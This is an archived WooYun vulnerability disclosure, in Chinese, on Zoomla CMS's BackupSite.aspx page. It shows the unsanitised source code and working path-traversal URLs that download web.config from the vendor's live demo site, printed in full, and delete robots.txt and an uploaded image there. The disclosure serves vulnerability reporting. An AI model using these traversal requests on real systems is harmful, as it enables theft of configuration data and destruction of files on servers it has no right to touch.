乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-09: 细节已通知厂商并且等待厂商处理中 2014-08-10: 厂商已经确认,细节仅向厂商公开 2014-08-13: 细节向第三方安全合作伙伴开放 2014-10-04: 细节向核心白帽子及相关领域专家公开 2014-10-14: 细节向普通白帽子公开 2014-10-24: 细节向实习白帽子公开 2014-11-07: 细节向公众公开
逐浪最新版 任意文件删除 任意文件下载
在此请求逐浪cms 重视每个白帽子提交的漏洞 不要老是漏洞忽略 地址
http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx
源码如下
protected void Page_Load(object sender, EventArgs e){ this.M_U = this.B_U.GetLogin(); if (base.Request.QueryString["status"] == "del") //任意文件删除 { this.del(base.Request.QueryString["name"].ToString()); } if (base.Request.QueryString["status"] == "down") //任意文件下载 { this.down(base.Request.QueryString["name"].ToString()); } this.GetBakFileList();}
我们先看下任意文件下载
public void down(string name){ base.Response.Clear(); base.Response.ClearContent(); base.Response.ClearHeaders(); base.Response.AddHeader("Content-Transfer-Encoding", "binary"); base.Response.ContentType = "application/octet-stream"; base.Response.ContentEncoding = Encoding.GetEncoding("gb2312"); string filename = base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name); //没处理 base.Response.WriteFile(filename); base.Response.Flush(); base.Response.End();}
漏洞证明 访问
demo.zoomla.cn/USER/Develop\SiteAdmin/BackupSite.aspx?status=down&name=../../../web.config
打开文件查看内容
<?xml version="1.0"?><!-- 注意: 除了手动编辑此文件以外,您还可以使用 Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的 “网站”->“Asp.Net 配置”选项。 设置和注释的完整列表在 machine.config.comments 中,该文件通常位于 \Windows\Microsoft.Net\Framework\v2.x\Config 中--><configuration> <configSections> <sectionGroup name="system.web"> <!--<section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true"/>--> </sectionGroup> <section name="RewriterConfig" type="URLRewriter.Config.RewriterConfigSerializerSectionHandler, URLRewriter"/> </configSections> <appSettings configSource="Config\AppSettings.config"/> <RewriterConfig configSource="Config\URLRewrite.config"/> <connectionStrings configSource="Config\ConnectionStrings.config"/> <system.web> <sessionState mode="InProc" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="20"/> <!--<identity impersonate="true" userName="administrator" password="password" />--> <!--Ajax支持--> <httpHandlers> <add verb="*" path="*.flv" type="ZoomLa.NoLink"/> <!--<add verb="*" path="*.aspx" type="URLRewriter.RewriterFactoryHandler,URLRewriter"/>--> <!--经典模式使用--> <!--<add verb="*" path="Images/*.jpg" type="UploadHandler"/>--> </httpHandlers> <!--end--> <compilation debug="false" targetFramework="4.0"> <assemblies> <add assembly="Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="Accessibility, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/> <add assembly="System.Messaging, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/> <add assembly="System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> <add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/> </assemblies> </compilation> <!--<neatUpload useHttpModule="True" maxNormalRequestLength="1048576" maxRequestLength="2097151" defaultProvider="FilesystemUploadStorageProvider"> <httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/> <providers> <add name="FilesystemUploadStorageProvider" type="Brettle.Web.NeatUpload.FilesystemUploadStorageProvider, Brettle.Web.NeatUpload"/> </providers> </neatUpload>--> <!--通过 <authentication> 节可以配置 ASP.NET 使用的 安全身份验证模式,以标识传入的用户。--> <!-- 如果在执行请求的过程中出现未处理的错误,则通过 <customErrors> 节可以配置相应的处理步骤。 具体说来,开发人员通过该节可以配置要显示的 html 错误页以代替错误堆栈跟踪。RemoteOnly --> <customErrors mode="Off" defaultRedirect="~/Prompt/GenericError.htm"> <error statusCode="403" redirect="~/Prompt/NoAccess.htm"/> <error statusCode="404" redirect="~/Prompt/FileNotFound.htm"/> <error statusCode="500" redirect="~/Prompt/GenericError.htm"/> </customErrors> <!--添加、移除或清除应用程序中的 HTTP 模块。--> <httpModules> <!--<add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload"/>--> <add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/> <!--<ADD NAME="MODULEREWRITER" TYPE="URLREWRITER.MODULEREWRITER, URLREWRITER"/>--> <!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>--> </httpModules> <!--<httpRuntime maxRequestLength="2097151" executionTimeout="3600" useFullyQualifiedRedirectUrl="true"/>--> <httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/> <pages configSource="Config\Pages.config"/> </system.web> <system.webServer> <validation validateIntegratedModeConfiguration="false"/> <modules runAllManagedModulesForAllRequests="true"> <!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>--> <add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/> </modules> <handlers> <add name="UrlHandles" path="*.aspx" verb="*" type="URLRewriter.RewriterFactoryHandler,URLRewriter" preCondition="integratedMode"/> <!--集成模式--> <add name="Zoomla" path="*.net" verb="*" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness32"/> </handlers> <defaultDocument> <files> <remove value="default.aspx"/> <add value="Default.aspx"/> </files> </defaultDocument> </system.webServer></configuration>
可下载其他内容的接着我们看下任意文件删除
protected void del(string name){ FileSystemObject.Delete(base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name), FsoMethod.File);}
public static void Delete(string file, FsoMethod method){ if ((method == FsoMethod.File) && File.Exists(file)) { File.Delete(file); } if ((method == FsoMethod.Folder) && Directory.Exists(file)) { Directory.Delete(file, true); }}
漏洞证明 我还是本地进行测试好点 先访问
http://demo.zoomla.cn/robots.txt
文件是存在的等下我访问
http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../robots.txt
在访问
不在了访问
http://demo.zoomla.cn/UploadFiles/3D/200912/200912111913258191.jpg
是存在的然后访问
http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../UploadFiles/3D/200912/200912111913258191.jpg
漏洞证明如上
对输入的参数进行处理
危害等级:中
漏洞Rank:5
确认时间:2014-08-10 13:40
感谢。
暂无